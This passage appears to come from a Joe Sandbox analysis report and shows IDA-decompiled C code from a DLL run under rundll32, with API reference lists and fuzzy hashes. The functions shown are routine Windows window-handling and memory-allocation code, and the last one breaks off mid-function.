                                                                                                        • String ID:
                                                                                                        • API String ID: 1124340077-0
                                                                                                        • Opcode ID: 58117642c7e16fb45c6b37f60c24110a7b854ed270339433ebe9bd66b8291f97
                                                                                                        • Instruction ID: cbb92d3347adb29273bfc1453446e38b95cb1432747feed1f6ca5e5dedf14878
                                                                                                        • Opcode Fuzzy Hash: 58117642c7e16fb45c6b37f60c24110a7b854ed270339433ebe9bd66b8291f97
                                                                                                        • Instruction Fuzzy Hash: 8741D370A40B098FDB22CF29C881A5AB7E5FB48704F11892DE596DB7A1D771E940CF10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 75%
                                                                                                        			E1000AEEB(void* _a4, short _a20, short _a24, short _a28, short _a32, short _a36, short _a40, WCHAR* _a44, WCHAR* _a48) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v24;
                                                                                                        				WCHAR* _v28;
                                                                                                        				void* _v32;
                                                                                                        				WCHAR* _v36;
                                                                                                        				short _v40;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t45;
                                                                                                        				long _t48;
                                                                                                        				void* _t49;
                                                                                                        				WCHAR* _t67;
                                                                                                        				void* _t70;
                                                                                                        				WCHAR* _t72;
                                                                                                        				short* _t73;
                                                                                                        				short* _t76;
                                                                                                        				signed int _t78;
                                                                                                        				void* _t79;
                                                                                                        
                                                                                                        				_t45 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t45 ^ _t78;
                                                                                                        				_t67 = _a48;
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_t72 = _a44;
                                                                                                        				_v36 = _t72;
                                                                                                        				_v28 = _t67;
                                                                                                        				if(_t72 == 0) {
                                                                                                        					_t76 = 0;
                                                                                                        				} else {
                                                                                                        					_t76 = lstrlenW(_t72) + 1;
                                                                                                        				}
                                                                                                        				if(_t67 == 0 ||  *_t67 == 0) {
                                                                                                        					_v28 = _t72;
                                                                                                        					_t73 = _t76;
                                                                                                        				} else {
                                                                                                        					_t73 = lstrlenW(_t67) + 1;
                                                                                                        				}
                                                                                                        				_t48 = _t73 + _t76 + _t73 + _t76 + 0x34;
                                                                                                        				_v40 = _t48;
                                                                                                        				_t49 = GlobalAlloc(0x2042, _t48);
                                                                                                        				_v32 = _t49;
                                                                                                        				if(_t49 != 0) {
                                                                                                        					_t67 = GlobalLock(_t49);
                                                                                                        					if(_v36 == 0) {
                                                                                                        						_t67[0x16] = _t67[0x16] & 0x00000000;
                                                                                                        					} else {
                                                                                                        						_t16 =  &(_t67[0x1a]); // 0x34
                                                                                                        						_t67[0x16] = 0x34;
                                                                                                        						E100011B0(_t67, _t73, _t76, _t78, _t16, _t76, _v36);
                                                                                                        						_t79 = _t79 + 0xc;
                                                                                                        					}
                                                                                                        					if(_v28 == 0) {
                                                                                                        						_t67[0x18] = _t67[0x18] & 0x00000000;
                                                                                                        					} else {
                                                                                                        						_t23 =  &(_t76[0x1a]); // 0x34
                                                                                                        						_t67[0x18] = _t76 + _t23;
                                                                                                        						E100011B0(_t67, _t73, _t76, _t78, _t67 + _t76 + _t23, _t73, _v28);
                                                                                                        					}
                                                                                                        					 *_t67 = _v40;
                                                                                                        					_t67[0xa] = _a20;
                                                                                                        					_t32 =  &(_t67[2]); // 0x4
                                                                                                        					_t73 = _t32;
                                                                                                        					_t76 =  &_v24;
                                                                                                        					asm("movsd");
                                                                                                        					_t67[0xc] = _a24;
                                                                                                        					asm("movsd");
                                                                                                        					_t67[0xe] = _a28;
                                                                                                        					_t67[0x10] = _a32;
                                                                                                        					asm("movsd");
                                                                                                        					_t67[0x12] = _a36;
                                                                                                        					asm("movsd");
                                                                                                        					_t67[0x14] = _a40;
                                                                                                        					GlobalUnlock(_v32);
                                                                                                        					_t49 = _v32;
                                                                                                        				}
                                                                                                        				return E10039F21(_t49, _t67, _v8 ^ _t78, _t70, _t73, _t76);
                                                                                                        			}
























                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$lstrlen$AllocLockUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3485620298-0
                                                                                                        • Opcode ID: 5a2b1033ba73c5bb61b14befbb218131f41d0969be005bdc4a128b7dd6cb1a7f
                                                                                                        • Instruction ID: 369260ebea5939965125d5f8093323404d65087dd7dc36d773aedbdbd935e9b0
                                                                                                        • Opcode Fuzzy Hash: 5a2b1033ba73c5bb61b14befbb218131f41d0969be005bdc4a128b7dd6cb1a7f
                                                                                                        • Instruction Fuzzy Hash: 28411AB190020A9FDF41DFA4C884AAA7BF8FF09385F110165ED05AB205D775EA45CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1000F1EC(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				struct HWND__* _t29;
                                                                                                        				signed int _t33;
                                                                                                        				signed short _t37;
                                                                                                        				signed int _t39;
                                                                                                        				struct HWND__* _t54;
                                                                                                        				void* _t55;
                                                                                                        				void* _t56;
                                                                                                        
                                                                                                        				_t56 = __eflags;
                                                                                                        				_t43 = __ebx;
                                                                                                        				_push(0x80);
                                                                                                        				E1003EE82(0x1005382f, __ebx, __edi, __esi);
                                                                                                        				 *(_t55 - 0x10) = __ecx;
                                                                                                        				E10007A5B(_t55 - 0x38);
                                                                                                        				_t46 = _t55 - 0x8c;
                                                                                                        				E1000D09A(_t55 - 0x8c, _t56);
                                                                                                        				 *(_t55 - 4) = 0;
                                                                                                        				_t29 = GetTopWindow( *(__ecx + 0x20));
                                                                                                        				while(1) {
                                                                                                        					_t54 = _t29;
                                                                                                        					if(_t54 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					 *(_t55 - 0x6c) = _t54;
                                                                                                        					 *(_t55 - 0x34) = GetDlgCtrlID(_t54) & 0x0000ffff;
                                                                                                        					 *((intOrPtr*)(_t55 - 0x24)) = _t55 - 0x8c;
                                                                                                        					_t33 = E1000E60C(_t46, 0, _t54, __eflags, _t54);
                                                                                                        					__eflags = _t33;
                                                                                                        					if(_t33 == 0) {
                                                                                                        						L3:
                                                                                                        						_t46 =  *(_t55 - 0x10);
                                                                                                        						__eflags = E100078E2(_t43,  *(_t55 - 0x10), _t54,  *(_t55 - 0x34), 0xffffffff, _t55 - 0x38, 0);
                                                                                                        						if(__eflags == 0) {
                                                                                                        							_t43 =  *(_t55 + 0xc);
                                                                                                        							__eflags = _t43;
                                                                                                        							if(_t43 != 0) {
                                                                                                        								_t37 = SendMessageA( *(_t55 - 0x6c), 0x87, 0, 0);
                                                                                                        								__eflags = _t37 & 0x00002000;
                                                                                                        								if((_t37 & 0x00002000) == 0) {
                                                                                                        									L10:
                                                                                                        									_t43 = 0;
                                                                                                        									__eflags = 0;
                                                                                                        								} else {
                                                                                                        									_t39 = E10011632(_t55 - 0x8c) & 0x0000000f;
                                                                                                        									__eflags = _t39 - 3;
                                                                                                        									if(_t39 == 3) {
                                                                                                        										goto L10;
                                                                                                        									} else {
                                                                                                        										__eflags = _t39 - 6;
                                                                                                        										if(_t39 == 6) {
                                                                                                        											goto L10;
                                                                                                        										} else {
                                                                                                        											__eflags = _t39 - 7;
                                                                                                        											if(_t39 == 7) {
                                                                                                        												goto L10;
                                                                                                        											} else {
                                                                                                        												__eflags = _t39 - 9;
                                                                                                        												if(_t39 == 9) {
                                                                                                        													goto L10;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t46 = _t55 - 0x38;
                                                                                                        							E10007A81(_t55 - 0x38,  *((intOrPtr*)(_t55 + 8)), _t43);
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t46 = _t33;
                                                                                                        						__eflags = E100078E2(_t43, _t33, _t54, 0, 0xbd11ffff, _t55 - 0x38, 0);
                                                                                                        						if(__eflags == 0) {
                                                                                                        							goto L3;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t29 = GetWindow(_t54, 2);
                                                                                                        				}
                                                                                                        				_t21 = _t55 - 4;
                                                                                                        				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
                                                                                                        				 *(_t55 - 0x6c) = 0;
                                                                                                        				return E1003EF21(E1000EED5(_t43, _t55 - 0x8c, 0, _t54,  *_t21));
                                                                                                        			}











                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CtrlH_prolog3MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 849854284-0
                                                                                                        • Opcode ID: 38a7cf8f352aa2a54155c01e95a1252c3d40d997d2a378c91caef02f7ebcc6ee
                                                                                                        • Instruction ID: 8762091eaa6030bd7be381a5a53b9ae70953d4528689b03b444658749c14eee8
                                                                                                        • Opcode Fuzzy Hash: 38a7cf8f352aa2a54155c01e95a1252c3d40d997d2a378c91caef02f7ebcc6ee
                                                                                                        • Instruction Fuzzy Hash: BC219139D00258AAEB11DFA0CC859BDBBB8FF55380F10421AF856E7499EF305E40EB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 70%
                                                                                                        			E100138E7(void* __ecx, void* __ebp, unsigned int _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				struct HWND__* _t20;
                                                                                                        				void* _t21;
                                                                                                        				void* _t23;
                                                                                                        				void* _t34;
                                                                                                        				void* _t35;
                                                                                                        				struct HWND__* _t36;
                                                                                                        				void* _t37;
                                                                                                        
                                                                                                        				_t37 = __ebp;
                                                                                                        				_t29 = __ecx;
                                                                                                        				_t35 = __ecx;
                                                                                                        				if((E10011632(__ecx) & 0x40000000) == 0) {
                                                                                                        					_t29 = __ecx;
                                                                                                        					_t34 = E1000F039(__ecx);
                                                                                                        				} else {
                                                                                                        					_t34 = __ecx;
                                                                                                        				}
                                                                                                        				_t41 = _t34;
                                                                                                        				if(_t34 == 0) {
                                                                                                        					E1000836F(0, _t29, _t34, _t35, _t41);
                                                                                                        				}
                                                                                                        				_push(_t37);
                                                                                                        				if((_a4 & 0x0000000c) != 0) {
                                                                                                        					_t23 = E1001175A(_t34);
                                                                                                        					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t34 == _t35) {
                                                                                                        						SendMessageA( *(_t34 + 0x20), 0x86, 0, 0);
                                                                                                        					} else {
                                                                                                        						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
                                                                                                        						SendMessageA( *(_t34 + 0x20), 0x86, 1, 0);
                                                                                                        						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_push(5);
                                                                                                        				_push(GetDesktopWindow());
                                                                                                        				while(1) {
                                                                                                        					_t20 = GetWindow();
                                                                                                        					_t36 = _t20;
                                                                                                        					if(_t36 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					_t21 = E10013272( *(_t34 + 0x20), _t36);
                                                                                                        					__eflags = _t21;
                                                                                                        					if(_t21 != 0) {
                                                                                                        						SendMessageA(_t36, 0x36d, _a4, 0);
                                                                                                        					}
                                                                                                        					_push(2);
                                                                                                        					_push(_t36);
                                                                                                        				}
                                                                                                        				return _t20;
                                                                                                        			}














                                                                                                        APIs
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        • SendMessageA.USER32 ref: 1001394D
                                                                                                        • SendMessageA.USER32 ref: 10013962
                                                                                                        • GetDesktopWindow.USER32 ref: 10013966
                                                                                                        • SendMessageA.USER32 ref: 1001398E
                                                                                                        • GetWindow.USER32(00000000), ref: 10013993
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$DesktopLong
                                                                                                        • String ID:
                                                                                                        • API String ID: 2272707703-0
                                                                                                        • Opcode ID: c5351df0981a8f9e0f1cb21dc48b7f85837bff062359d9caf76a5fe6da3494e1
                                                                                                        • Instruction ID: dd73b784d881f3b841c37e14bf89774b85a44912a5d202968077c96401651001
                                                                                                        • Opcode Fuzzy Hash: c5351df0981a8f9e0f1cb21dc48b7f85837bff062359d9caf76a5fe6da3494e1
                                                                                                        • Instruction Fuzzy Hash: 2A11C4313007567BE625DA258C82F6E7B99FB40794F018129FA416D5E1DFB1ED808794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 60%
                                                                                                        			E1000D470(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
                                                                                                        				struct tagRECT _v20;
                                                                                                        				int _t22;
                                                                                                        				struct HWND__* _t23;
                                                                                                        				struct HWND__* _t42;
                                                                                                        				void* _t43;
                                                                                                        
                                                                                                        				_t43 = __ecx;
                                                                                                        				_t22 = IsWindowVisible( *(__ecx + 0x20));
                                                                                                        				if(_t22 != 0 || _a12 != _t22 || _a16 != _t22) {
                                                                                                        					_t23 = ScrollWindow( *(_t43 + 0x20), _a4, _a8, _a12, _a16);
                                                                                                        				} else {
                                                                                                        					_push(5);
                                                                                                        					_push( *(_t43 + 0x20));
                                                                                                        					while(1) {
                                                                                                        						_t23 = GetWindow();
                                                                                                        						_t42 = _t23;
                                                                                                        						if(_t42 == 0) {
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						GetWindowRect(_t42,  &_v20);
                                                                                                        						E10008D13(_t43,  &_v20);
                                                                                                        						SetWindowPos(_t42, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
                                                                                                        						_push(2);
                                                                                                        						_push(_t42);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if( *((intOrPtr*)(_t43 + 0x4c)) != 0 && _a12 == 0) {
                                                                                                        					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x4c)))) + 0x5c))(_a4, _a8);
                                                                                                        				}
                                                                                                        				return _t23;
                                                                                                        			}









                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32 ref: 1000D47E
                                                                                                        • GetWindowRect.USER32 ref: 1000D4A4
                                                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 1000D4CF
                                                                                                        • GetWindow.USER32(00000005,00000005), ref: 1000D4D8
                                                                                                        • ScrollWindow.USER32 ref: 1000D4F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$RectScrollVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 2639402888-0
                                                                                                        • Opcode ID: de1e536205bd9ae399f0021d43844fc4f823050e254a6ed550c112e73ab88896
                                                                                                        • Instruction ID: af533430d1b0bd8e605d2e50cf64afe7c61b44704b8a1de1178095635678027e
                                                                                                        • Opcode Fuzzy Hash: de1e536205bd9ae399f0021d43844fc4f823050e254a6ed550c112e73ab88896
                                                                                                        • Instruction Fuzzy Hash: D421583220061ABFEB21DF54CC84AAF77B9FB48395F00842AFA4592160E770AE11DB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 83%
                                                                                                        			E100260EB(void* __eflags, struct HWND__* _a4, int _a8, signed int* _a12) {
                                                                                                        				void* __ebx;
                                                                                                        				struct HWND__* _t28;
                                                                                                        				void* _t35;
                                                                                                        				intOrPtr* _t42;
                                                                                                        
                                                                                                        				_t42 = _a4;
                                                                                                        				E1002605D(_t35, _t42, _a8);
                                                                                                        				E100115B7( *((intOrPtr*)(_t42 + 4)), _a8,  &_a4);
                                                                                                        				if( *_t42 != 0) {
                                                                                                        					 *_a12 =  *_a12 | 0xffffffff;
                                                                                                        				}
                                                                                                        				_a8 = 0;
                                                                                                        				L3:
                                                                                                        				L3:
                                                                                                        				if((SendMessageA(_a4, 0x87, 0, 0) & 0x00000040) != 0) {
                                                                                                        					_push(0);
                                                                                                        					if( *_t42 == 0) {
                                                                                                        						SendMessageA(_a4, 0xf1, 0 | _a8 ==  *_a12, ??);
                                                                                                        					} else {
                                                                                                        						if(SendMessageA(_a4, 0xf0, 0, ??) != 0) {
                                                                                                        							 *_a12 = _a8;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_a8 = _a8 + 1;
                                                                                                        				}
                                                                                                        				_t28 = GetWindow(_a4, 2);
                                                                                                        				_a4 = _t28;
                                                                                                        				if(_t28 == 0) {
                                                                                                        					goto L11;
                                                                                                        				}
                                                                                                        				_t28 = GetWindowLongA(_t28, 0xfffffff0);
                                                                                                        				if((_t28 & 0x00020000) == 0) {
                                                                                                        					goto L3;
                                                                                                        				}
                                                                                                        				L11:
                                                                                                        				return _t28;
                                                                                                        			}








                                                                                                        APIs
                                                                                                          • Part of subcall function 100115B7: GetDlgItem.USER32 ref: 100115C4
                                                                                                        • SendMessageA.USER32 ref: 1002612C
                                                                                                        • SendMessageA.USER32 ref: 10026140
                                                                                                        • SendMessageA.USER32 ref: 10026166
                                                                                                        • GetWindow.USER32(?,00000002), ref: 10026170
                                                                                                        • GetWindowLongA.USER32 ref: 10026180
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemLong
                                                                                                        • String ID:
                                                                                                        • API String ID: 1613074769-0
                                                                                                        • Opcode ID: ac836804c5819b89763a2c198cdd7b7ced236cba3b2f933886bbc518ad60361d
                                                                                                        • Instruction ID: 7cdf8fb39533faa8e1545ce2786c1c6102a7056552ed4c36b4998f31c91876fc
                                                                                                        • Opcode Fuzzy Hash: ac836804c5819b89763a2c198cdd7b7ced236cba3b2f933886bbc518ad60361d
                                                                                                        • Instruction Fuzzy Hash: 38113A7560021AFFEF008F50DC81EAA7B69EF453A4F548125FD199A2A1C730ED61DF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100121B1(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                                                                                        				signed short _t24;
                                                                                                        				unsigned int _t34;
                                                                                                        				void* _t46;
                                                                                                        
                                                                                                        				_t46 = __ecx;
                                                                                                        				if(IsWindow( *(__ecx + 0x20)) == 0) {
                                                                                                        					 *(_t46 + 0xac) = _a4;
                                                                                                        					 *(_t46 + 0xb0) = _a8;
                                                                                                        					 *(_t46 + 0xa4) = _a12;
                                                                                                        					_t24 = _a16;
                                                                                                        					 *(_t46 + 0xa8) = _t24;
                                                                                                        					return _t24;
                                                                                                        				}
                                                                                                        				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                                                                                        				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                                                                                        				if( *0x10071880 >= 0x60000) {
                                                                                                        					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
                                                                                                        					 *(_t46 + 0xac) = _t34 & 0x0000ffff;
                                                                                                        					 *(_t46 + 0xb0) = _t34 >> 0x10;
                                                                                                        				}
                                                                                                        				return InvalidateRect( *(_t46 + 0x20), 0, 1);
                                                                                                        			}







                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$InvalidateRectWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3225880595-0
                                                                                                        • Opcode ID: 2c95d48c81d6bf34d1f12587b3bd2bba49f3c34484c88fdfea9f65f913444163
                                                                                                        • Instruction ID: 5450d3fd6f6ed9012d5be3e1a5a1166e0e22c885d66a395389b2f99e4ac93a3b
                                                                                                        • Opcode Fuzzy Hash: 2c95d48c81d6bf34d1f12587b3bd2bba49f3c34484c88fdfea9f65f913444163
                                                                                                        • Instruction Fuzzy Hash: DB1119B1200318AFE7108F29CC80ABBB7E9FB48345F00452EF9DAD6160E7B0AD50DB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E100216BF(intOrPtr* __ecx, int* _a4) {
                                                                                                        				int _v8;
                                                                                                        				int _t12;
                                                                                                        				int _t14;
                                                                                                        				int _t22;
                                                                                                        				int _t32;
                                                                                                        				int* _t36;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_t35 = __ecx;
                                                                                                        				if(__ecx == 0) {
                                                                                                        					_t22 =  *0x10099128; // 0x60
                                                                                                        					_t12 =  *0x1009912c; // 0x60
                                                                                                        					goto L6;
                                                                                                        				} else {
                                                                                                        					_t32 = GetMapMode( *(__ecx + 8));
                                                                                                        					if(_t32 >= 7 || _t32 == 1) {
                                                                                                        						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                        						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                        						L6:
                                                                                                        						_t36 = _a4;
                                                                                                        						_v8 = _t12;
                                                                                                        						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                                                                        						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                                                                        						_t36[1] = _t14;
                                                                                                        					} else {
                                                                                                        						_push(3);
                                                                                                        						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                        						E10008DF4(__ecx, _a4);
                                                                                                        						_push(_t32);
                                                                                                        						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t14;
                                                                                                        			}










                                                                                                        APIs
                                                                                                        • GetMapMode.GDI32(?,00000000,?,?,?,?,10021764,?,?,?,10004AA0,?,?,?,?,?), ref: 100216CF
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10021709
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10021712
                                                                                                          • Part of subcall function 10008DF4: MulDiv.KERNEL32(?,00000000,00000000), ref: 10008E34
                                                                                                          • Part of subcall function 10008DF4: MulDiv.KERNEL32(?,00000000,00000000), ref: 10008E51
                                                                                                        • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10021736
                                                                                                        • MulDiv.KERNEL32(?,000009EC,?), ref: 10021741
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice$Mode
                                                                                                        • String ID:
                                                                                                        • API String ID: 696222070-0
                                                                                                        • Opcode ID: f1748aea756ef58c239055301fc4019a9ace941d9e2431e06909099bac9919c8
                                                                                                        • Instruction ID: 8fc3245c16c7d2604328c5ebbaed59c8368981f0c9b29448464012318c201f26
                                                                                                        • Opcode Fuzzy Hash: f1748aea756ef58c239055301fc4019a9ace941d9e2431e06909099bac9919c8
                                                                                                        • Instruction Fuzzy Hash: A311C239600614AFDB21AF69CC88C4EBBF9FF987507110419FA8697361C771AD018F80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E100296F9(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v263;
                                                                                                        				char _v264;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t9;
                                                                                                        				struct HWND__* _t21;
                                                                                                        				void* _t22;
                                                                                                        				intOrPtr _t25;
                                                                                                        				void* _t26;
                                                                                                        				int _t27;
                                                                                                        				CHAR* _t28;
                                                                                                        				signed int _t29;
                                                                                                        
                                                                                                        				_t25 = __edx;
                                                                                                        				_t22 = __ecx;
                                                                                                        				_t9 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t9 ^ _t29;
                                                                                                        				_t21 = _a4;
                                                                                                        				_t32 = _t21;
                                                                                                        				_t28 = _a8;
                                                                                                        				if(_t21 == 0) {
                                                                                                        					L1:
                                                                                                        					E1000836F(_t21, _t22, _t26, _t28, _t32);
                                                                                                        				}
                                                                                                        				if(_t28 == 0) {
                                                                                                        					goto L1;
                                                                                                        				}
                                                                                                        				_t27 = lstrlenA(_t28);
